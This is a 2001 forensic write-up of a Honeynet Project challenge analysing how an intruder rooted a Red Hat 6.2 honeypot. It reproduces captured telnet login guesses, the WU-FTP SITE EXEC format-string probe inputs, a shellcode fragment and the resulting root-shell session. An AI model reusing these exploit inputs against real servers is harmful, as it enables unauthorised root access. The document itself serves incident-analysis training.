Intrusion Detection Analysis

Honeynet Project Scan 19

 

October 20, 2001

	Document Status v. 1 Matthew M. Shannon MCSE, MCDBA

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

                       

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Table Of Contents

Table of contents ................................................................................................. I...........

Requirements.......................................................................................................... 17

Methodology and Tools Used...................................................................... 18

Event Summary....................................................................................................... 19

Recommendation................................................................................................... 20

Event Analysis........................................................................................................ 21

Event Sequence.................................................................................................................. 21

Findings.............................................................................................................................. 26

Appendix...................................................................................................................... 28

Recovered Files.................................................................................................................. 28

Additional Information......................................................................................................... 28

Touch() Manual Page.......................................................................................................... 33

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Requirements

 

On September 16th a Redhat Linux 6.2 honeypot was compromised. This is the 3rd time this system was compromised by the same intruder. The honeynet is VMware based and uses a modified bash to log to syslog. Syslog is remotlyremotely  logging to 0.0.0.0 (remote syslog server IP has been replaced). The compromised system has an IP of 192.168.1.102. After successfully breaking into the box, the attacker ended up using 3 modes of connecting and running commands (some of which isare encrypted). The attacker also tried to hide some of his edits from the MAC times.

 

 

1. Which vulnerability did the intruder exploit?
2. What ways, and in what order, did the intruder use to connect and run commands on the system?
3. How did the intruder try to hide his edits from the MAC times?
4. The intruder downloaded Rootkits, what were they called? Are they new/custom Rootkits?
5. Recover (tell how you did it too) the Rootkits from the snort binary capture
6. What does the Rootkit do to hide the presence of the attacker on the system?
7. What did you learn from this exercise?
8. How long did this challenge take you?

 

Bonus Questions:
Based on this challenge, write an example letter of notification to the source owner that attacked the system. Include any evidence or logs that you feel important.

 

 

 

Methodology and Tools Used

 

In order to decode the packets and analyze the intrusion the analyst used a copy of Ethereal (www.ethereal.com). Ethereal has the ability to selectively decode TCP Streams and save them as ASCII text. This feature combined with many others made short work of analyzing the packet streams. In order to determine the types of attacks, the packet stream was also run through Snort (www.snort.org) an open-source Intrusion Detection System (IDS). Snort provided further information on the types of attacks that were attempted. Lastly, the provided Syslog file further clarified the chain of events.

Event Summary

 

On September 16th a Red Hat Linux 6.2 server was compromised. The intruder made use of a well-known FTP overflow exploit (http://www.cert.org/advisories/CA-2000-13.html). Following the success of the exploit the intruder created two user ID’s for future access. The intruder then reconnected using the newly created user ID’s and established a file download from a remote server.

 The purpose of a download is to obtain a specialized toolkit used to replace key system files and create a backdoor for easy re-entry. During the course of the attack and occupation, the intruder proceeded to make multiple connections to and from external machines via encrypted and unencrypted channels.

 

Recommendation

 

As part of a sound Information Security program, we recommend that an Information Security Policy be developed and used to insure strong controls, both preventive and corrective going forward. The Information Security policy would address the need to maintain accurate and timely backups, provide procedures for the timely application of system updates and patches, and remove informative banners from login prompts.

Through preparation and planning the risks associated with computer usage can be addressed and mitigated.

Event Analysis

 

Event Sequence

 

Failed Telnet Session

Source Information

Date/Time(Start/End):    2001-09-16 19:53:10/19:54:00

Elapsed Time:                50 Seconds

IP Address:                   217.156.93.166

Location Name:             MIDO-IMPEX

Address:                       S.C. MIDO IMPEX S.R.L.

Address:                       9 C 5 MARASESTI STREET, 5500, BACAU, ROMANIA

Country:                        RO

 

Summary

            The initial connection attempts received from the intruder are puzzling at first glance. The intruder attempts a sequence of user names and passwords that do not resemble typical usernames. Our assumption is that the intruder feels he has previously compromised this system and is attempting to reconnect using previously created user names and passwords. 

We find this to be true.   Based on information provided by the Honeynet Project , we know that the intruder  compromised this machine in the past. Therefore, his attempts to login represent formerly valid user ids on a typical compromised system.

            The failed login attempt prompts him to attempt to re-establish control on the machine.

 

ASCII Source

           

ÿû­ÿû ÿûÿû'ÿýÿû

---

ÿý

---

ÿýÿý ÿý#ÿý'ÿü#ÿý­ÿûÿý

---

ÿû

---

ÿú­ P ÿðÿú ÿðÿú'ÿðÿúÿðÿú  38400,38400ÿðÿú' ÿðÿú XTERMÿðÿýÿûÿý!ÿü

Red Hat Linux release 6.2 (Zoot)

Kernel 2.2.14-5.0 on an i586

ÿþÿü!login: nnoobbooddyy

 

Password: ultravirus

 

Login incorrect

 

login: nnoobbooddyy

 

Password: virus

 

Login incorrect

 

login: uuuuccpp

 

Password: Login timed out after 60 seconds

 

 

 

WU-FTP Site Exec Buffer OverFlow exploit to compromise system

Source Information

Date/Time(Start/End):    2001-09-16 19:55:45/20:56:14

Elapsed Time:                1 Hour

IP Address:                   217.156.93.166

Location Name:             MIDO-IMPEX

Address:                       S.C. MIDO IMPEX S.R.L.

Address:                       9 C 5 MARASESTI STREET, 5500, BACAU, ROMANIA

Country:                        RO

CERT Advisory:             http://www.cert.org/advisories/CA-2000-13.html

RedHat Update:             http://www.redhat.com/support/errata/RHSA-2000-039-02.html

 

 

Summary

            Having determined that the system has FTP running, and finding that the FTP Daemon[1] is WU-FTP, the intruder decided to try the WU-FTP 2.6 Site Exec Buffer Overflow exploit. This exploit overloads the memory buffers used by the FTP Daemon causing it to crash and present a Root[2] level access.

Root access is the highest level of access on a Unix system. By using Root level privileges, the intruder is able to move through the compromised system’s files at will.

After the intruder has finished navigating the file system, he creates accounts for himself, which will be the accounts he will use for future access.

The first account he creates is named “Nobody”. This account does not have root level access, and it is no different than any existing user account. The second account he creates is named “dns”.  This account has root level access. The most likely reason for naming the root level account “dns” is to hide it among other system accounts, since DNS[3] is common service provided by Unix machines, it would reason that system accounts could exist named “dns”. The most likely reason for creating two accounts is to allow the intruder to telnet back to the system using the non-root ID, and then switch or “su”[4] to the root ID.

In order to hide the file edits needed to create the user accounts, the intruder uses the “touch”[5] command, which allows him to alter the dates associated with changes to the user files.

 

ASCII Source

 

220 ns1 FTP server (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000) ready.

USER ftp

331 Guest login ok, send your complete e-mail address as password.

PASS mozilla@

230 Guest login ok, access restrictions apply.

SITE EXEC %020d|%.f%.f|

200-00000000000000000049|0-2|

200  (end of '%020d|%.f%.f|')

SITE EXEC 7 mmmmnnnn%.f%.f%.f%.f%.f%. f%.f|%08x|%08x|

200-7 mmmmnnnn-2-2000-2000000000000000000000000000000000nan00000000-200000000000000000000000000000000000000000000000000000000000000000000000000-2-240nan|bfffdc7e|00000000|

200  (end of '7 mmmmnnnn%.f%. f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f|%08x|%08x|')

 

Í€1À1Û°Í€è�ÿÿÿ0bin0sh1..11

id;

uid=0(root) gid=0(root) groups=50(ftp)

w

  4:17am  up 3 days, 10:25,  0 users,  load average: 0.00, 0.00, 0.00

USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT

dir

bin   dev  home  lost+found  opt   root  tmp  var

boot  etc  lib                         mnt                        proc  sbin  usr

cd /usr

ls

X11R6

bin

dict

doc

etc

games

i386-redhat-linux

i486-linux-libc5

include

info

kerberos

lib

libexec

local

man

sbin

share

src

tmp

cd local

dir

bin  doc  etc  games  info  lib  man